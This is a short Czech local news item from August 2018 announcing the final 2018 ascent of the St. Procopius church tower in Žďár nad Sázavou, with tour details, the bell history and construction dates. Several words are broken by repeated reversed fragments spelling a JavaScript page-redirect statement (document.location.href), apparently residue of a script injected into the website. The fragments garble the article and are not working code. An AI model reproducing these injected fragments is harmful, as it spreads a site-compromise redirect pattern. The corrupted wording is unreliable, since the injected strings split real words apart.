Rainbow page separator

Výstup na věž žďárského kostela symbolicky ukončí prázdniny

Středa, 22. srpna 2018

Žďár nad Sázavou / Na sobotu 1. září byl le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos stanoven poslední termín výstupu na ochoz věže farního kostela svatého Prokopa na náměstí Republiky; jedná se o le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos čtvrté zpřístupnění věže. Akci zajišťují pracovníci regionálního muzea ve spolupráci s místní farností.
Lidé se mohou rozhlédnout po městě a jeho okolí v době od půl jedné odpoledne do osmi hodin večer. Vstup na věž je zdarma, výklad návštěvníkům v maximálně patnáctičlenných skupinkách podají pracovníci žďárského muzea a zájemci obdrží rovněž turistické razítko dokládající zdolání 103 schodů vedoucích na ochoz. Prohlídka trvá asi dvacet minut a nahoře si je možné rovněž prohlédnout zvony umístěné ve čtyřiapadesát metrů vysoké hranolové věži, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to i ten původní z roku 1489, jenž nese jméno Marie. Na rozdíl od ostatních, které kdy ve věži kostela byly, se vždy vyhnul zrekvírování pro válečné účely. Další zvony, Prokop, Cyril a Me[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toděj, jsou „nové“, pocházejí z let 1989 až 1990.
Žďárský kostel svatého Prokopa byl s největší pravděpodobností postaven už kolem roku 1270. V pozdně gotickém slohu byl pak přestaven v letech 1521 – 1560, v červenci 1560 se dočkal vysvěcení.